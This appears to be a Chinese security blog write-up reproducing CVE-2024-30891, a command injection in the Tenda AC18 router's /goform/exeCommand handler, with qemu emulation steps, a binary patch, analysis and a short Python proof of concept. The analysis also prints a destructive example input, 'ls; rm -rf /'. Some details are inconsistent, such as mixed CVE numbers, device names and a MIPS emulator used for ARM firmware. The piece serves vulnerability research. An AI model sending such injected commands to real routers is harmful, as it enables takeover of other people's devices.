【工业安全】-CVE-2024-30891- Tenda AC18路由器 命令注入漏洞
1.漏洞描述
2.漏洞复现
2.1 qemu-user 模拟:
2.2 qemu-system模拟:
3.漏洞分析
4.poc代码:
1.漏洞描述
漏洞编号:CVE-2024-30891
漏洞名称:Tenda AC18 命令注入
威胁等级:高危
漏洞详情:Tenda AC 18 v15.03.05.05的/goform/exeCommand中存在命令注入漏洞,攻击者可利用该漏洞构造命令输入参数以执行任意命令。
影响范围:v15.03.05.05
2.漏洞复现
在/home/CVE-2024-30891目录下,用qemu-usr用户模式模拟,把固件模拟运行起来。
2.1 qemu-user 模拟:
1.首先在CVE-2022-35555.py同级目录下,binwalk -eM 解压文件。
2.然后对binwalk解包后的固件中的任何二进制文件执行 file 命令,查看下设备的cpu 架构。
命令:file ./bin/httpd
可知Tenda AC18路由器的httpd是基于ARM架构的 32 位小端序可执行文件。
3.给httpd文件可执行权限,命令:chmod +x httpd
4.复制squashfs-root目录下的webroot_ro文件到webroot中
rm -rf webroot
ln -s webroot_ro/ webroot5.执行模拟命令,sudo qemu-mipsel-static -L . ./bin/httpd
但是卡在这里了,在IDA里面看一下httpd,搜索 welcome,定向分析可知Loc_2E2FC会对 check_network 函数的返回值进行判断,只有网络检查通过才会跳转到右侧loc_2E320继续执行,否则会被卡住。
修改图中MOV R3,R0为MOV R3,#1 。
具体修改时,先在 https://disasm.pro/ 上查一下汇编对应的十六进制:
6.将path 后的httpd 替换原来的文件。
重新给httpd文件可执行权限,进入squashfs-root目录,打开终端。
执行命令: sudo qemu-arm-static -L . ./bin/httpd
失败,所以Tenda AX1803也不支持在本机上开启80端口模拟路由器。
因此要建立一个虚拟网桥br0,配置一下网络:
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0重新模拟:sudo qemu-arm-static -L . ./bin/httpd
此时能够访问web界面了:
但是执行poc时出现:
所以不能使用qumu-user模拟路由器,要qemu-system模拟的debian-armhf系统模拟。所以不能使用qumu-user模拟路由器,要qemu-system模拟的debian-armhf系统模拟。
2.2 qemu-system模拟:
已知Tenda AC18路由器的httpd是基于ARM架构的 32 位小端序可执行文件。
1.创建diban目录,下载模拟qemu-system需要的阉割debian(debian-armhf)系统:
https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpres#进行qemu-system模拟,进入debian-armhf系统:
$sudo qemu-system-arm \
-M vexpress-a9 \
-kernel vmlinuz-3.2.0-4-vexpress \
-initrd initrd.img-3.2.0-4-vexpress \
-drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \
-append "root=/dev/mmcblk0p2 console=ttyAMA0" \
-net nic \
-net tap,ifname=br0,script=no,downscript=no \
debian-armhf login: 账号密码都是root
2.使用 qemu-system系统模拟debian-armhf时,需要建立一个虚拟网桥,使得debian-armhf与我们的宿主机ubuntu16.04能正常通信:
#配置宿主机ubuntu 16.04的ip:
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.2.1/24
#配置虚拟机qemu system模拟的debian-armhf系统的ip:
ifconfig eth0 192.168.2.2/24
3.将宿主机ubuntu 16.04的固件打包上传到debian-armhf虚拟机中
在宿主机ubuntu 16.04上:
打包home/ml/CVE-2020-10987目录下的squashfs-root文件到root根目录
tar -czvf squashfs-root.tar.gz squashfs-root
sudo mv squashfs-root.tar.gz /root/
在虚拟机qemu-system模拟的debian-armhf系统上:
将位于ubuntu16.04的根目录的squashfs-root.tar.gz 文件复制到qemu-system模拟的debian-armhf系统上,并解压。
scp root@192.168.2.1:/root/squashfs-root.tar.gz /root/squashfs-root.tar.gz
解压/root/squashfs-root.tar.gz 文件
tar xzf squashfs-root.tar.gz
rm squashfs-root.tar.gz
4.挂载文件系统
$mount -o bind /dev ./squashfs-root/dev
$mount -t proc /proc ./squashfs-root/proc
5.桥接br0
chroot squashfs-root/ sh
brctl addbr br0
ifconfig br0 192.168.2.2/24 up
6.模拟固件
chroot squashfs-root/ bin/httpd
浏览器访问:192.168.2.2
执行poc后可在临时文件中得到hack文件:
python a.py
3.漏洞分析
使用 binwalk -eM 解包固件,获得系统文件以备后续分析。
/goform/exeCommand 请求会触发漏洞,具体漏洞代码存在于<解压后的固件>/squashfs-root/bin/httpd 文件中,exeCommand函数里:
Ida查找exeCommand 函数:
与CVE-2022-3555的漏洞点相同,甚至更直白(cmdinput 参数取到的值没有经过任何检查就传到传递给 doSystemCmd )
可以通过构造恶意输入来注入额外的命令:
src = "ls; rm -rf /";
故我们可以构造
http://<ip router>/goform/exeCommand+"cmdinput=asd;ls -la . > 注入命令来复现此漏洞。
4.poc代码:
代码复现时环境ip为 192.168.2.2
import requests
IP = '192.168.2.2:80'
url = f"http://{IP}/goform/exeCommand"
data = "cmdinput=asd;ls -la . > ./tmp/hack;"
ret = requests.post(url=url,data=data)参考文章:IoT-vuln/Tenda/AC18/formexeCommand.md at main · Lantern-r/IoT-vuln · GitHub
相关文章:
【工业安全】-CVE-2024-30891- Tenda AC18路由器 命令注入漏洞
1.漏洞描述 2.漏洞复现 2.1 qemu-user 模拟: 2.2 qemu-system模拟: 3.漏洞分析 4.poc代码: 1.漏洞描述 漏洞编号:CVE-2024-30891 漏洞名称:Tenda AC18 命令注入 威胁等级:高危 漏洞详情:Ten…...
如何从0开始将vscode源码编译、运行、打包桌面APP
** 网上关于此的内容很少,今天第二次的完整运行了,按照下文的顺序走不会出什么问题。最重要的就是环境的安装,否则极其容易报错,请参考我的依赖版本以及文末附上的vscode官方指南 ** 第一步:克隆 VSCode 源码 首先…...
登录弹窗效果
1,要求 点击登录按钮,弹出登录窗口 提示1:登录窗口 display:none 隐藏状态; 提示2:登录按钮点击后,触发事件,修改 display:block 显示状态 提示3:登录窗口中点击关闭按钮࿰…...
)
wps或office的word接入豆包API(VBA版本)
直接上代码,由于时间匆忙,以后写个详细的教程 #If VBA7 ThenPrivate Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As…...
深入浅出 Python Logging:从基础到进阶日志管理
在 Python 开发过程中,日志(Logging)是不可或缺的调试和监控工具。合理的日志管理不仅能帮助开发者快速定位问题,还能提供丰富的数据支持,让应用更具可观测性。本文将带你全面了解 Python logging 模块,涵盖…...
系统巡检脚本分享:守护服务器的“健康卫士”
在日常的运维工作中,系统巡检是一项至关重要的任务。它可以帮助我们及时发现服务器的潜在问题,确保系统的稳定运行。今天,我想和大家分享一个实用的系统巡检脚本,它能够帮助我们快速、全面地检查服务器的健康状况。 一、为什么需…...
索引时定义运行时字段)
【Elasticsearch】运行时字段(Runtime Fields)索引时定义运行时字段
在 Elasticsearch 中,运行时字段(Runtime Fields)是一种在查询时动态计算的字段,而不是在索引时预先存储的字段。运行时字段为数据处理提供了极大的灵活性,尤其是在处理结构不固定的日志数据或需要动态生成字段值的场景…...
C++引用与inline,nullptr)
C++从入门到实战(四)C++引用与inline,nullptr
C从入门到实战(四)C引用与inline,nullptr 前言一、C 引用(一)什么是引用(二)引用的特点(三)引用作为函数参数(四)引用作为函数返回值(…...
)
DeepSeek 助力 Vue 开发:打造丝滑的卡片(Card)
前言:哈喽,大家好,今天给大家分享一篇文章!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏关注哦 💕 目录 Deep…...
Azure Synapse Dedicated SQL Pool统计指定表中各字段的空值、空字符串或零值比例
-- 创建临时表存储结果 CREATE TABLE #Results (DatabaseName NVARCHAR(128),TableName NVARCHAR(128),ColumnName NVARCHAR(128),DataType NVARCHAR(128),NullOrEmptyCount INT,TotalRows INT,Percentage DECIMAL(10,2) );DECLARE db_name SYSNAME DB_NAME(); -- 获取当前数…...
-目标检测-SSD(Single Shot MultiBox Detector)—— 单次检测多框检测器)
【深度学习】计算机视觉(CV)-目标检测-SSD(Single Shot MultiBox Detector)—— 单次检测多框检测器
🔹 SSD(Single Shot MultiBox Detector)—— 单次检测多框检测器 1️⃣ 什么是 SSD? SSD (Single Shot MultiBox Detector) 是一种用于 目标检测(Object Detection) 的 深度学习模型,由 Wei L…...
)
力扣100. 相同的树(利用分解思想解决)
Problem: 100. 相同的树 文章目录 题目描述思路Code 题目描述 思路 题目要求判断两个二叉树是否完全相同,而此要求可以利用问题分解的思想解决,即判断当前节点的左右子树是否完全相同,而在二叉树问题分解的一般题目中均会带有返回值ÿ…...
在SpringBoot服务器端采购上,如何选择操作系统、Cpu、内存和带宽、流量套餐
在Spring Boot服务器端采购时,选择操作系统、CPU、内存、带宽和流量套餐需根据应用需求、预算和性能要求综合考虑。以下是具体建议: 1. 操作系统 Linux发行版(如Ubuntu、CentOS):适合大多数Spring Boot应用ÿ…...
》出版了!)
我的新书《青少年Python趣学编程(微课视频版)》出版了!
🎉 激动人心的时刻来临啦! 🎉 小伙伴们久等了,我的第一本新书 《青少年Python趣学编程(微课视频版)》 正式出版啦! 📚✨ 在这个AI时代,市面上的Python书籍常常过于枯燥&…...
elementUI rules 判断 el-cascader控件修改值未生效
今天修改一个前端项目,增加一个多选字段,使用的是el-cascader控件,因页面是通过引用子页面组件形式使用,出现一个点选后再勾选原有值,输入框内不展示或取消后的也未正常隐藏,如果勾选的值是全新的则其他已选…...
深度学习与人工智能:解锁未来的无限可能
在当今这个科技飞速发展的时代,深度学习和人工智能已不再只是科幻小说中的概念,它们正以惊人的速度渗透到我们生活的方方面面,从智能手机上的语音助手到医疗领域的疾病诊断,从自动驾驶汽车到金融市场的风险预测,其影响…...
pwa应用进阶2-动态加载manifest.json文件
接pwa应用进阶-区分AB面-添加安装按钮而且区分不同的系统和浏览器的各种情况继续优化,主要是让manifest.json文件动态加载。 pwa应用进阶2-动态加载manifest.json文件 主要用途如下: 动态切换PWA的清单文件,例如根据不同的语言或者主题加载不…...
UI用例调试_元素能定位到且不在frame内_无法点击/录入文本
关于单据新增,编辑子集信息遇到的2个阻塞点,做记录已供后续参考 1、新增按钮元素能定位,就是无法点击 实现效果: 单据新增时,前面单据数据编辑完之后,开始新增证件信息,需要先点击新增按钮。…...
Python的web框架Flask适合哪些具体的应用开发?
Flask 适用的具体应用及实现案例代码 Flask 是一个轻量级的 Web 应用框架,以其简洁性和灵活性而广受欢迎。以下是 Flask 适合的具体应用场景及相关的实现案例代码: 1. 小型网站或博客 由于 Flask 的简洁性和易于使用的特性,它非常适合用来搭建个人博客或者小型的企业网站…...
oracle使用动态sql将多层级组织展平
ERP或者其他企业管理软件中都会有一张组织机构表,可以写固定sql的方式将其展平获取组织表中的字段信息,如负责人、上级组织负责人、分管领导、成立时间等。但是这种方式有个缺陷,就是如果只写到处理4个层级,那么后期层级增多就无法…...
vue学习笔记10
ChatGPT & Copilot AI 的认知 两个工具 1、ChatGPT 3.5 2、Github Copilot ChatGPT 的基本使用 - Prompt 优化 AI 互动的过程中,容易出现的问题: 1、 AI未能理解问题的核心要点 2、 AI的回答过于宽泛 或 过于具体 3、 AI提供了错误的信息或…...
网络安全常识
随着互联网和移动互联网的持续火热,人们的生活也越来越离不开网络,网络安全,在这个信息化时代显得尤为重要,那么网络攻击和安全,这一攻守之间,主要涵盖哪些要点呢,下面我们就来对此进行抽丝剥茧…...
如何在 Visual Studio Code 中使用 DeepSeek R1 和 Cline?
让我们面对现实吧:像 GitHub Copilot 这样的 AI 编码助手非常棒,但它们的订阅费用可能会在你的钱包里烧一个洞。进入 DeepSeek R1 — 一个免费的开源语言模型,在推理和编码任务方面可与 GPT-4 和 Claude 3.5 相媲美。将它与 Cline 配对&#…...
从Sora到有言:3D视频生成技术的突破与应用
近年来,AIGC领域飞速发展,这个词也越来越高频地出现在了大家的生活中。AIGC 能完成的任务也越来越多,大模型的能力飞速增长 —— 从Deepseek生成文字,到StableDiffusion生成图像,再到Sora可以生成视频。 而现在&#x…...
只出现一次的数字)
算法18(力扣136)只出现一次的数字
1、问题 给你一个 非空 整数数组 nums,除了某个元素只出现一次以外,其余每个元素均出现两次。找出那个只出现了一次的元素。 你必须设计并实现线性时间复杂度的算法来解决此问题,且该算法只使用常量额外空间。 2、示例 (1&…...
基于HTML5 Canvas 和 JavaScript 实现的烟花动画效果
以下是一个使用 HTML5 Canvas 和 JavaScript 实现的烟花动画效果代码盒子: <!DOCTYPE html> <html> <head><title>烟花效果...
)
网络变压器的主要电性参数与测试方法(1)
Hqst盈盛(华强盛)电子导读:网络变压器的主要电性参数与测试方法(1).. 今天我们就一起先来看看网络变压器的2个主要电性参数与它的测试方法: 1. 开路电感(OCL or Lx----Open Circuit Ind…...
Python + WhisperX:解锁语音识别的高效新姿势
大家好,我是烤鸭: 最近在尝试做视频的质量分析,打算利用asr针对声音判断是否有人声,以及识别出来的文本进行进一步操作。asr看了几个开源的,最终选择了openai的whisper,后来发现性能不行,又换了…...
函数介绍和判断窗口是否在当前界面显示)
Qt的isVisible ()函数介绍和判断窗口是否在当前界面显示
1、现象:当Qt的窗口最小化时,isVisible值一定是true,这是正常的。 解释:在Qt中,当你点击窗口的最小化按钮时,Qt内部不会自动调用 hide() 方或 setVisible(false) 来隐藏窗口。相反,它会改变窗口…...
Github 2025-02-12 C开源项目日报 Top7
根据Github Trendings的统计,今日(2025-02-12统计)共有7个项目上榜。根据开发语言中项目的数量,汇总情况如下: 开发语言项目数量C项目7Python项目2OpenSSL - 强大的开源加密工具包 创建周期:4012 天开发语言:C协议类型:Apache License 2.0Star数量:23449 个Fork数量:10…...
PostgreSQL 数据类型
PostgreSQL 数据类型 PostgreSQL 是一款功能强大的开源关系型数据库管理系统,它以其出色的性能、灵活的数据类型和强大的扩展性而闻名。在 PostgreSQL 中,数据类型是构建数据库表和执行各种操作的基础。本文将详细介绍 PostgreSQL 中常用的数据类型,并探讨它们的使用场景。…...
synchronized关键字
文章目录 synchronized 关键字介绍synchronized 的内存语义 synchronized 关键字介绍 synchronized 块是 Java 提供的一种原子性 内 置锁, Java 中的每个对象都可以把它当作一个 同步锁来使用 , 这些 Java 内置的使用者看不到的锁被称为内部锁 …...
(全代码))
MATLAB计算反映热需求和能源消耗的度数日指标(HDD+CDD)(全代码)
目录 度数日(Degree Days, DD)概述计算公式MATLAB计算代码调用函数1:计算单站点的 CDD参考度数日(Degree Days, DD)概述 度数日(Degree Days, DD)是用于衡量建筑、城市和地区的热需求和能源消耗模式的指标。它分为两部分: 加热度日(Heating Degree Days, HDD):当室…...
在Linux中Redis不支持lua脚本的处理方法
redis安装在IP为x.x.x.x的服务器上 redis安装 第一步,安装前,检测系统是否安装了redis。若安装了redis,则需要删除redis;若没有安装redis,则需要安装2.6版本以上的redis。 # 确保Redis版本支持Lua脚本。从Redis 2.6…...
)
第39周:猫狗识别 2(Tensorflow实战第九周)
目录 前言 一、前期工作 1.1 设置GPU 1.2 导入数据 输出 二、数据预处理 2.1 加载数据 2.2 再次检查数据 2.3 配置数据集 2.4 可视化数据 三、构建VGG-16网络 3.1 VGG-16网络介绍 3.2 搭建VGG-16模型 四、编译 五、训练模型 5.1 上次程序的主要Bug 5.2 修改版…...
SpringBoot自定义starter
首先创建Maven项目 引入依赖 <dependencies><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-autoconfigure</artifactId><version>3.4.2</version></dependency> </dependencies…...
JVM学习
JVM 1、JVM是一个跨语言的平台,与语言无关 2、java虚拟机规范:一流企业做标准,二流企业做品牌,三流企业做产品 JVM种类 Hotspot:Oracle 公司,有商业版和免费版 open jdk 内部包含免费版本hotspot虚拟机 Jr…...
RAG入门: RetroMAE、BGE、M3、MemoRAG
RAG实际上第一步都是先做Retrieval,关于Retrieval的思路有很多,持续更新: RetroMAE (论文RetroMAE: Pre-Training Retrieval-oriented Language Models Via Masked Auto-Encoder) RetraoMAE包括两个模块,…...
ruby 的安装
在51cto搜索的资料 ruby on rails的安装 http://developer.51cto.com/art/200906/129669.htm http://developer.51cto.com/art/200912/169391.htm http://developer.51cto.com/art/200908/147276.htm 史上最完整的ruby,rails环境架设配置(Apachefast…...
MySQL的备份与还原
备份数据库 使用mysqldump工具是备份MySQL数据库的一种常用方法。mysqldump可以导出数据库的结构和数据到一个SQL文件中,这个文件稍后可以被用来重新创建数据库或恢复数据。以下是mysqldump命令的详细扩写: mysqldump -u <username> -p<passw…...
文心快码|AI重构开发新范式,从工具到人机协同
本系列视频来自百度前端架构师张立理,他在以“应用来了”为主题的2024百度世界大会上,进行了文心快码3.0能力演示,端到端能力展示。 以下视频是关于文心快码全栈编程智能体-AI重构开发新范式 文心快码AI重构开发新范式 百度前端架构师张立理认…...
Windows11+PyCharm利用MMSegmentation训练自己的数据集保姆级教程
系统版本:Windows 11 依赖环境:Anaconda3 运行软件:PyCharm 一.环境配置 通过Anaconda Prompt(anaconda)打开终端创建一个虚拟环境 conda create --name mmseg python3.93.激活虚拟环境 conda activate mmseg 4.安装pytorch和cuda tor…...
)
方法(构造方法、方法重载、可变参数)
方法(Method) 方法是组织好的、可以重复使用的代码块,用于实现单一或相关联的功能。方法有助于提高代码的模块化和可读性,并且通过减少代码冗余来促进代码的重用。 一个方法通常包含5中部分组成: 访问修饰符…...
ES节点配置的最佳实践
一个 Elasticsearch(ES)节点可以同时包含数据节点和主节点的角色。这种配置在某些场景下是可行的,尤其是在小型集群中。然而,在生产环境中,通常建议将主节点和数据节点的角色分离,以提高集群的稳定性和性能…...
langchain学习笔记之langserve服务部署
langchain学习笔记之langserve服务部署 引言 LangServe \text{LangServe} LangServe简单介绍安装过程示例应用调用模型接口实现交互使用 Requests \text{Requests} Requests方式进行交互 附: server.py \text{server.py} server.py完整代码 引言 本节将介绍 LangSe…...
Docker安装分布式vLLM
Docker安装分布式vLLM 1 介绍 vLLM是一个快速且易于使用的LLM推理和服务库,适合用于生产环境。单主机部署会遇到显存不足的问题,因此需要分布式部署。 分布式安装方法 https://docs.vllm.ai/en/latest/serving/distributed_serving.html2 安装方法 …...
Java SpringBoot的ProblemDetail实现全局异常统一处理让接口不在需要catch/ProblemDetail实现错误处理的标准化
在开发 Web 应用时,有效的错误处理和响应是提升用户体验和系统健壮性的关键。Spring Boot 3.2 引入了对 ProblemDetail 的更好支持,使得错误处理更加标准化和便捷。本文将通过实战演示,带你深入了解如何在 Spring Boot 3.2 中使用 ProblemDet…...
PHP 基础介绍
PHP 学习资料 PHP 学习资料 PHP 学习资料 PHP 是一种广泛使用的开源服务器端脚本语言,尤其适合 Web 开发,能轻松嵌入 HTML 中,生成动态网页内容。接下来,让我们一起了解 PHP 的基础内容。 一、PHP 的安装与配置 在开始编写 PH…...
CI/CD部署打包方法
项目目前部署方式: 各地区服务器打包同一个runner(需要互相排队,不并发)各地区客户端可以并发打包,同个地区客户端打多个包需要排队 部署方法 下载gitlab-runner: https://docs.gitlab.com/runner/insta…...
Unity-Mirror网络框架-从入门到精通之PlayerTest示例
文章目录 前言示例介绍PlayerReliable,PlayerUnreliable,PlayerHybrid区别PlayerControllerRB和PlayerController区别最后前言 在现代游戏开发中,网络功能日益成为提升游戏体验的关键组成部分。本系列文章将为读者提供对Mirror网络框架的深入了解,涵盖从基础到高级的多个主…...